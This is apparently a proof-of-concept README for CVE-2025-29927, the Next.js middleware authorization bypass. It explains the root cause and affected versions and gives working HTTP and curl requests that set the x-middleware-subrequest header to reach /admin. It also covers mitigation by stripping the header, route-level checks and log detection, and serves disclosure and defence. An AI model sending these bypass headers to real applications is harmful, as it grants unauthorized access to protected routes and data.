
CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
CVE-2025-29927 is a critical vulnerability (CVSS 9.1) in Next.js that allows attackers to bypass middleware-based security checks.
Readme

# CVE-2025-29927 – Next.js Middleware Authorization Bypass

## Overview  
**CVE-2025-29927** is a **critical** vulnerability (CVSS 9.1) in Next.js that allows an unauthenticated attacker to bypass **middleware-based security checks** such as authentication, access control, and redirects.  

The issue affects self-hosted applications served with `next start` (including `output: 'standalone'` builds) and stems from improper handling of the internal **`x-middleware-subrequest`** HTTP header. By adding this header to an ordinary request, an attacker makes Next.js treat the request as one of its own subrequests and **skip middleware execution**, which gives direct access to routes that only middleware protected (e.g., `/admin`).  

---

## Affected Versions  
The following ranges are confirmed vulnerable:

- **11.x:** from **11.1.4** up to the latest 11.x release  
- **12.x:** from **12.0.0** up to **12.3.4**  
- **13.x:** from **13.0.0** up to **13.5.8**  
- **14.x:** from **14.0.0** up to **14.2.24**  
- **15.x:** from **15.0.0** up to **15.2.2**  

---

## Root Cause – Why This Happens  
Next.js uses the header `x-middleware-subrequest` **internally** to mark requests that middleware itself issues (for example a `fetch` to another route of the same app). When the server sees a request already tagged with the middleware's own name, it does not run middleware again, which prevents infinite recursion.  

The header was never meant to be **user-controlled**, but nothing distinguished an external request carrying it from an internal one. A client that sets it to the middleware's internal name is therefore treated as internal and **middleware is skipped entirely**, resulting in a complete **authorization bypass**. The expected value depends on version and file layout: `middleware` for a root-level `middleware.ts`, `src/middleware` when the file lives under `src/`, and `pages/_middleware` (plus nested `pages/.../_middleware` names) on 12.0 and 12.1, as the analyses listed under References describe.  

Next.js 15.x changed the check to a recursion-depth counter: the header value is split on `:` and middleware is skipped once the middleware's name occurs at least `MAX_RECURSION_DEPTH` (5) times. That is why the 15.x payload repeats the name **five times**, colon-separated. The counter was meant to bound recursion, but it is still fed by an attacker-supplied header, so the bypass survives.  

![Next.js Middleware Bypass Execution Flow](https://datadog-securitylabs.imgix.net/img/nextjs-middleware-auth-bypass/execution_flow.png?auto=format&w=1000&dpr=1.75)  
*Execution flow of the vulnerability (source: Datadog Security Labs)*
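To make the two checks concrete, here is an added example written for this page, not Next.js source: a simplified model of the header logic described above, covering both the basic bypass and the 15.x recursion-depth variant used in the Exploitation section. The version boundaries are the advisory's; `isPatched`, `middlewareSkipped` and `bypassHeader` are names chosen here for illustration, and the patched behaviour is modelled only as "an external header never skips middleware".

```javascript
// Added example for this page, not Next.js source code: a simplified model
// of the x-middleware-subrequest check and the header value that defeats it.
// Version boundaries come from the advisory; the name derivation mirrors how
// the published analyses describe the PoC values.

const MAX_RECURSION_DEPTH = 5; // limit introduced in 15.x

// First fixed release per major; 11.x never received a fix.
const FIXED = { 12: [12, 3, 5], 13: [13, 5, 9], 14: [14, 2, 25], 15: [15, 2, 3] };

function parseVersion(version) {
  return version.split('.').map((n) => parseInt(n, 10));
}

function isPatched(version) {
  const v = parseVersion(version);
  const fixed = FIXED[v[0]];
  if (!fixed) return v[0] > 15; // 11.x stays vulnerable; majors above 15 ship fixed
  for (let i = 0; i < 3; i++) {
    if (v[i] > fixed[i]) return true;
    if (v[i] < fixed[i]) return false;
  }
  return true;
}

// middlewareName is what the server derives from the middleware file location:
// 'middleware' or 'src/middleware' on 12.2+, 'pages/_middleware' on 11.1.4-12.1.x.
// Returns true when the request would be served without running middleware.
function middlewareSkipped(version, headerValue, middlewareName) {
  if (isPatched(version)) return false; // patched: external header is ignored
  if (!headerValue) return false;       // no header: middleware runs normally
  const subrequests = headerValue.split(':');
  const [major] = parseVersion(version);
  if (major < 15) {
    // 11.1.4 - 14.2.24: a single matching entry marks the request as internal
    return subrequests.includes(middlewareName);
  }
  // 15.0.0 - 15.2.2: the name must appear at least MAX_RECURSION_DEPTH times
  const depth = subrequests.filter((s) => s === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Header value an attacker sends for a given version and middleware name.
function bypassHeader(version, middlewareName) {
  const [major] = parseVersion(version);
  return major >= 15
    ? Array(MAX_RECURSION_DEPTH).fill(middlewareName).join(':')
    : middlewareName;
}

// Walk a few versions to show where the single and the repeated payload work.
for (const version of ['12.1.6', '13.5.8', '14.2.24', '15.2.2', '15.2.3']) {
  const name = version.startsWith('12.1') ? 'pages/_middleware' : 'middleware';
  const single = middlewareSkipped(version, name, name);
  const repeated = middlewareSkipped(version, bypassHeader(version, name), name);
  console.log(`${version.padEnd(8)} single=${single} repeated=${repeated}`);
}
```

The walk prints `single=true` for every vulnerable pre-15 release, `single=false repeated=true` for 15.2.2, and `false` for both on 15.2.3. Note that the repeated form also satisfies the older `includes` check, which is why the five-value payload is a safe default when the exact version is unknown.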

---

## Exploitation  

### 1. Basic Bypass
For versions prior to v15, a single `x-middleware-subrequest` value naming the middleware is enough. `middleware` matches a root-level `middleware.ts`; use `src/middleware` if the file lives under `src/`, or `pages/_middleware` on 12.0 and 12.1:  
```http
GET /admin HTTP/1.1
Host: vulnerable-site.com
x-middleware-subrequest: middleware
```

### 2. Recursive-Depth Bypass (v15.x)
For v15.x, the attacker must repeat the middleware's name **five times**, colon-separated, to reach the recursion depth limit (substitute `src/middleware` where applicable):  
```http
GET /admin HTTP/1.1
Host: vulnerable-site.com
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

**cURL PoC** (the five-value form also works on older vulnerable versions, which only check that the name is present):
```bash
# -i prints the status line and headers; compare with the same request without
# the header, which on a protected route should redirect or return 401/403
curl -i "https://target.com/admin" \
  --header "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```

If `/admin` was protected only by middleware, the response comes back as though the check had passed: the request without the header is redirected to the login page, the one with the header returns the protected content.  

---

## Impact  
- **Authentication & Authorization Bypass** – Direct access to routes that only middleware guarded (`/admin`, `/api/private`).  
- **Loss of middleware-set protections** – Security headers (for example Content-Security-Policy), geo-blocking and rewrites implemented in middleware are not applied to the bypassing request.  
- **Cache Poisoning / DoS** – A response produced without middleware (an error page, or a page a rewrite would normally have replaced) can be stored by a CDN or cache in front of the app and served to other users.  
- **Privilege Escalation** – If backend logic relies solely on middleware checks, attackers act with whatever privileges the unguarded route grants.  

---

## Mitigation  

### **1. Upgrade**  
Upgrade to the fixed release for your major: **12.3.5**, **13.5.9**, **14.2.25**, or **15.2.3** (or later). 11.x has no fixed release, so those apps must move to a supported major.  

### **2. Strip the Header**  
If upgrading isn't immediately possible, drop the header at the proxy or app server so it never reaches Next.js. Apply it on every path that proxies to the app, then verify by sending a request that carries the header and confirming the protected route still redirects or denies.  

**Nginx** (an empty value makes nginx omit the header; `proxy_set_header` directives are inherited only by `location` blocks that define none of their own, so add this line to each block that already has some):  
```nginx
proxy_set_header x-middleware-subrequest "";
```

**Apache** (requires `mod_headers`):  
```apache
RequestHeader unset x-middleware-subrequest
```

**Express.js middleware** (only effective when Next.js runs behind a custom Express server that passes the same `req` to `app.getRequestHandler()`; register it before that handler):  
```js
app.use((req, res, next) => { 
  // Node lowercases incoming header names, so this key matches any casing
  delete req.headers['x-middleware-subrequest']; 
  next(); 
});
```

### **3. Add Defense‑in‑Depth**  
Do not rely solely on middleware for authorization—enforce access checks at the API/controller level.  
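An added illustration of that route-level check, written for this page rather than taken from the PoC or from Next.js: the session store, cookie name and `requireRole` helper are placeholders, and the handler is a plain function over the standard `Request`/`Response` objects (Node 18+) so it runs outside Next.js. The point it shows is that the decision is made inside the handler, so it holds even when the request carries the bypass header and middleware never ran.

```javascript
// Added example for this page (not the PoC's or Next.js's code): authorization
// enforced inside the route handler, independent of middleware.
// Requires Node 18+ for the global Request/Response classes.

// Hypothetical session store; a real app would consult its session backend.
const SESSIONS = new Map([
  ['sess-admin-1', { user: 'alice', role: 'admin' }],
  ['sess-user-1', { user: 'bob', role: 'user' }],
]);

function sessionFromRequest(req) {
  const cookie = req.headers.get('cookie') || '';
  const match = cookie.match(/(?:^|;\s*)session=([^;]+)/);
  return match ? SESSIONS.get(match[1]) || null : null;
}

// Route-level guard: the same check middleware would perform, but executed by
// the handler itself, so skipping middleware changes nothing.
function requireRole(req, role) {
  const session = sessionFromRequest(req);
  if (!session) return new Response('unauthorized', { status: 401 });
  if (session.role !== role) return new Response('forbidden', { status: 403 });
  return null; // authorized; caller proceeds
}

// Handler for GET /admin, shaped like an App Router route handler.
function adminHandler(req) {
  const denied = requireRole(req, 'admin');
  if (denied) return denied;
  return Response.json({ ok: true, user: sessionFromRequest(req).user });
}

// Build a request that carries the bypass header together with a given cookie.
function probe(cookie) {
  const headers = {
    'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware',
  };
  if (cookie) headers.cookie = cookie;
  return adminHandler(new Request('http://localhost/admin', { headers }));
}

console.log('no cookie    ->', probe(null).status);                   // 401
console.log('user cookie  ->', probe('session=sess-user-1').status);  // 403
console.log('admin cookie ->', probe('session=sess-admin-1').status); // 200
```

The bypass header is present on every probe and makes no difference: the 401/403/200 outcome is decided entirely by the session the handler itself resolves.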

---

## Detection  
- **Log Analysis:** Look for inbound requests carrying the `x-middleware-subrequest` header; a legitimate client never sends it. Default access-log formats do not record request headers, so add the field at the edge (nginx `$http_x_middleware_subrequest`, Apache `%{x-middleware-subrequest}i`), then pay particular attention to 2xx responses on routes that should have redirected or denied.  
- **WAF/IDS:** Deploy updated detection rules (e.g., Snort, F5, Check Point) that flag or block this header on inbound traffic.  

---

## References  
- [NVD – CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)  
- [JFrog Analysis](https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/)  
- [Datadog Security Labs](https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/)  
- [Vercel Postmortem](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)  

---

### **Takeaway**  
If your Next.js app uses middleware for access control and runs on `next start` or standalone mode — **patch now**. Until then, **strip the `x-middleware-subrequest` header** and enforce **redundant authorization checks** on sensitive routes.  